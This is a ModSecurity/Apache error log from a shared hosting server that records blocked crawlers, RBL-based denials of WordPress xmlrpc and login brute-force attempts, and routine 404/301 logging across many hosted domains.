[Tue May 26 14:31:59.812643 2026] [security2:error] [pid 610693:tid 610838] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhhzvNO3hpmlY6M8R3TwAAAA8"]
[Tue May 26 14:32:01.743834 2026] [security2:error] [pid 610693:tid 610866] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhiTvNO3hpmlY6M8R3eQAAACs"]
[Tue May 26 14:32:02.868846 2026] [core:crit] [pid 610693:tid 610927] (13)Permission denied: [client 157.55.39.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:32:02.906869 2026] [security2:error] [pid 610693:tid 610838] [client 114.119.132.28:45593] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mahehealthcare.com"] [uri "/our-doctors"] [unique_id "ahVhijvNO3hpmlY6M8R3mwAAAA8"], referer: https://abstractdirectory.net/Health/Other_Health/?p=4367
[Tue May 26 14:32:03.169619 2026] [security2:error] [pid 610693:tid 610910] [client 202.141.83.254:53890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhizvNO3hpmlY6M8R3owAAAFc"]
[Tue May 26 14:32:03.169781 2026] [security2:error] [pid 610693:tid 610910] [client 202.141.83.254:53890] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhizvNO3hpmlY6M8R3owAAAFc"]
[Tue May 26 14:32:03.607493 2026] [core:crit] [pid 610693:tid 610861] (13)Permission denied: [client 207.46.13.124:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 14:32:03.915615 2026] [security2:error] [pid 610693:tid 610911] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhizvNO3hpmlY6M8R3qwAAAFg"]
[Tue May 26 14:32:06.152173 2026] [security2:error] [pid 610693:tid 610900] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhjTvNO3hpmlY6M8R31AAAAE0"]
[Tue May 26 14:32:06.355249 2026] [security2:error] [pid 610693:tid 610924] [client 185.191.171.8:51840] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-7-11/list/"] [unique_id "ahVhjjvNO3hpmlY6M8R33AAAAGU"]
[Tue May 26 14:32:06.355424 2026] [security2:error] [pid 610693:tid 610924] [client 185.191.171.8:51840] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-7-11/list/"] [unique_id "ahVhjjvNO3hpmlY6M8R33AAAAGU"]
[Tue May 26 14:32:06.879396 2026] [security2:error] [pid 610693:tid 610914] [client 154.161.32.97:46542] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhjjvNO3hpmlY6M8R34gAAAFs"]
[Tue May 26 14:32:06.879571 2026] [security2:error] [pid 610693:tid 610914] [client 154.161.32.97:46542] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhjjvNO3hpmlY6M8R34gAAAFs"]
[Tue May 26 14:32:07.988207 2026] [security2:error] [pid 610693:tid 610868] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhjzvNO3hpmlY6M8R39wAAAC0"]
[Tue May 26 14:32:09.409143 2026] [ssl:error] [pid 610693:tid 610889] [client 54.86.115.253:45943] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname webmail.grandconclaveindia.org.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 14:32:10.055225 2026] [security2:error] [pid 610693:tid 610907] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhkTvNO3hpmlY6M8R4IgAAAFQ"]
[Tue May 26 14:32:11.328682 2026] [security2:error] [pid 610693:tid 610927] [client 114.119.155.228:44961] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVhkzvNO3hpmlY6M8R4SgAAAGg"], referer: http://haddingtonwines.com/cart?remove_item=f58c9875ac84dfe1fbe91b918773d050
[Tue May 26 14:32:11.734555 2026] [security2:error] [pid 610693:tid 610849] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhkzvNO3hpmlY6M8R4RgAAABo"]
[Tue May 26 14:32:12.306692 2026] [security2:error] [pid 610693:tid 610798] [remote 8.130.10.226:38946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.10.130.8.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVhlDvNO3hpmlY6M8R4WwAAV2g"]
[Tue May 26 14:32:13.486147 2026] [security2:error] [pid 610693:tid 610837] [client 114.119.146.251:28707] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.plenitudotonal.com"] [uri "/robots.txt"] [unique_id "ahVhlTvNO3hpmlY6M8R4iQAAAA4"]
[Tue May 26 14:32:13.645352 2026] [security2:error] [pid 610693:tid 610842] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhlTvNO3hpmlY6M8R4fAAAABM"]
[Tue May 26 14:32:13.667583 2026] [security2:error] [pid 610693:tid 610948] [client 202.141.83.254:5730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhlTvNO3hpmlY6M8R4jAAAAH0"]
[Tue May 26 14:32:13.667713 2026] [security2:error] [pid 610693:tid 610948] [client 202.141.83.254:5730] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhlTvNO3hpmlY6M8R4jAAAAH0"]
[Tue May 26 14:32:14.578872 2026] [security2:error] [pid 610693:tid 610892] [client 45.148.10.204:52730] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4ngAAAEU"]
[Tue May 26 14:32:14.582686 2026] [security2:error] [pid 610693:tid 610878] [client 45.148.10.204:52734] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4nwAAADc"]
[Tue May 26 14:32:14.592856 2026] [security2:error] [pid 610693:tid 610911] [client 45.148.10.204:52756] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4oQAAAFg"]
[Tue May 26 14:32:14.597414 2026] [security2:error] [pid 610693:tid 610857] [client 45.148.10.204:52740] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4ogAAACI"]
[Tue May 26 14:32:14.598648 2026] [security2:error] [pid 610693:tid 610942] [client 45.148.10.204:52762] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4oAAAAHc"]
[Tue May 26 14:32:14.625306 2026] [security2:error] [pid 610693:tid 610877] [client 45.148.10.204:52794] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4pAAAADY"]
[Tue May 26 14:32:14.625913 2026] [security2:error] [pid 610693:tid 610875] [client 45.148.10.204:52778] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4pQAAADQ"]
[Tue May 26 14:32:14.646862 2026] [security2:error] [pid 610693:tid 610949] [client 45.148.10.204:52806] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4qwAAAH4"]
[Tue May 26 14:32:14.663422 2026] [security2:error] [pid 610693:tid 610847] [client 45.148.10.204:52804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4qAAAABg"]
[Tue May 26 14:32:14.672680 2026] [security2:error] [pid 610693:tid 610905] [client 45.148.10.204:52830] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4rwAAAFI"]
[Tue May 26 14:32:14.673033 2026] [security2:error] [pid 610693:tid 610874] [client 45.148.10.204:52820] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4rQAAADM"]
[Tue May 26 14:32:14.688141 2026] [security2:error] [pid 610693:tid 610938] [client 45.148.10.204:52826] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4rgAAAHM"]
[Tue May 26 14:32:14.695840 2026] [security2:error] [pid 610693:tid 610823] [client 45.148.10.204:52846] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4sQAAAAA"]
[Tue May 26 14:32:14.698618 2026] [security2:error] [pid 610693:tid 610856] [client 45.148.10.204:52848] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4sAAAACE"]
[Tue May 26 14:32:14.725049 2026] [security2:error] [pid 610693:tid 610851] [client 45.148.10.204:52856] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4sgAAABw"]
[Tue May 26 14:32:14.726340 2026] [security2:error] [pid 610693:tid 610827] [client 45.148.10.204:52864] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4tQAAAAQ"]
[Tue May 26 14:32:14.729586 2026] [security2:error] [pid 610693:tid 610925] [client 45.148.10.204:52854] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4tgAAAGY"]
[Tue May 26 14:32:14.739477 2026] [security2:error] [pid 610693:tid 610896] [client 45.148.10.204:52876] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4swAAAEk"]
[Tue May 26 14:32:14.743698 2026] [security2:error] [pid 610693:tid 610829] [client 45.148.10.204:52886] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4tAAAAAY"]
[Tue May 26 14:32:14.745807 2026] [security2:error] [pid 610693:tid 610907] [client 45.148.10.204:52884] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4twAAAFQ"]
[Tue May 26 14:32:14.764781 2026] [security2:error] [pid 610693:tid 610843] [client 45.148.10.204:52902] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4vQAAABQ"]
[Tue May 26 14:32:14.777227 2026] [security2:error] [pid 610693:tid 610929] [client 45.148.10.204:52892] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4vAAAAGo"]
[Tue May 26 14:32:14.793158 2026] [security2:error] [pid 610693:tid 610917] [client 45.148.10.204:52928] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4vgAAAF4"]
[Tue May 26 14:32:14.795476 2026] [security2:error] [pid 610693:tid 610888] [client 45.148.10.204:52912] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4vwAAAEE"]
[Tue May 26 14:32:14.802402 2026] [security2:error] [pid 610693:tid 610940] [client 45.148.10.204:52934] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4wQAAAHU"]
[Tue May 26 14:32:14.806638 2026] [security2:error] [pid 610693:tid 610836] [client 45.148.10.204:52948] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4wAAAAA0"]
[Tue May 26 14:32:14.821180 2026] [security2:error] [pid 610693:tid 610928] [client 45.148.10.204:52958] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4wwAAAGk"]
[Tue May 26 14:32:15.283973 2026] [security2:error] [pid 610693:tid 610901] [client 45.148.10.204:52974] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4wgAAAE4"]
[Tue May 26 14:32:15.299116 2026] [security2:error] [pid 610693:tid 610884] [client 45.148.10.204:52986] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4xAAAAD0"]
[Tue May 26 14:32:15.312831 2026] [security2:error] [pid 610693:tid 610920] [client 45.148.10.204:53008] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4xQAAAGE"]
[Tue May 26 14:32:15.325864 2026] [security2:error] [pid 610693:tid 610895] [client 45.148.10.204:52994] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4xgAAAEg"]
[Tue May 26 14:32:15.338956 2026] [security2:error] [pid 610693:tid 610912] [client 45.148.10.204:53012] ModSecurity: Warning. Matched phrase "Firefox/7.0" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4ygAAAFk"]
[Tue May 26 14:32:15.338989 2026] [security2:error] [pid 610693:tid 610912] [client 45.148.10.204:53012] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVhljvNO3hpmlY6M8R4ygAAAFk"]
[Tue May 26 14:32:15.829802 2026] [security2:error] [pid 610693:tid 610908] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhlzvNO3hpmlY6M8R41QAAAFU"]
[Tue May 26 14:32:18.208569 2026] [security2:error] [pid 610693:tid 610910] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhmTvNO3hpmlY6M8R5FQAAAFc"]
[Tue May 26 14:32:20.002606 2026] [security2:error] [pid 610693:tid 610834] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhmzvNO3hpmlY6M8R5RAAAAAs"]
[Tue May 26 14:32:21.982659 2026] [security2:error] [pid 610693:tid 610840] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhnTvNO3hpmlY6M8R5fgAAABE"]
[Tue May 26 14:32:22.110069 2026] [security2:error] [pid 610693:tid 610727] [remote 40.77.167.50:28773] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.167.77.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.athelstan.org.in"] [uri "/athelstan-downloads-summons.php"] [unique_id "ahVhnjvNO3hpmlY6M8R5iAAAPiE"]
[Tue May 26 14:32:23.982179 2026] [security2:error] [pid 610693:tid 610847] [client 202.141.83.254:5662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhnzvNO3hpmlY6M8R5tQAAABg"]
[Tue May 26 14:32:23.982334 2026] [security2:error] [pid 610693:tid 610847] [client 202.141.83.254:5662] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhnzvNO3hpmlY6M8R5tQAAABg"]
[Tue May 26 14:32:24.340255 2026] [security2:error] [pid 610693:tid 610919] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVhoDvNO3hpmlY6M8R5vAAAAGA"], referer: https://www.bloggertarget.com
[Tue May 26 14:32:24.464277 2026] [security2:error] [pid 610693:tid 610873] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhoDvNO3hpmlY6M8R5uAAAADI"]
[Tue May 26 14:32:26.520315 2026] [security2:error] [pid 610693:tid 610930] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhojvNO3hpmlY6M8R5-QAAAGs"]
[Tue May 26 14:32:28.043007 2026] [security2:error] [pid 610693:tid 610857] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhozvNO3hpmlY6M8R6HQAAACI"]
[Tue May 26 14:32:28.974033 2026] [security2:error] [pid 610693:tid 610921] [client 113.175.206.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhpDvNO3hpmlY6M8R6PwAAAGI"]
